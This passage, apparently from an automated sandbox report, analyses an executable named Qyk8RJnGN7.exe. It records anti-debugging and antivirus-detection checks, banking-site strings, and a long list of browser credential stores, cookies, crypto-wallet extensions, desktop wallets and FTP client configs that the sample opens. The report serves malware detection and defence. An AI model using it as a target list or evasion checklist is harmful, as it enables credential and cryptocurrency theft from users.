    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe System information queried: ModuleInformation
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Process information queried: ProcessInformation

    Anti Debugging

    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: NTICE
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: SICE
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: SIWVID
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Process queried: DebugPort
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1229036620.0000000000EB2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Qyk8RJnGN7.exe, 00000000.00000003.986574444.0000000001526000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.999584270.000000000152D000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.000000000152E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: les%\Windows Defender\MsMpeng.exe
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000003.983998868.0000000001526000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.986597414.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980321985.000000000152D000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.00000000014F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Binance
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe | Directory queried: C:\Users\user\Documents

    Remote Access Functionality

    Source: Yara match | File source: sslproxydump.pcap, type: PCAP

    MITRE ATT&CK Matrix

    Techniques are listed per tactic; the number in parentheses is the count of matched signatures for that technique, techniques without a count were not observed.

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
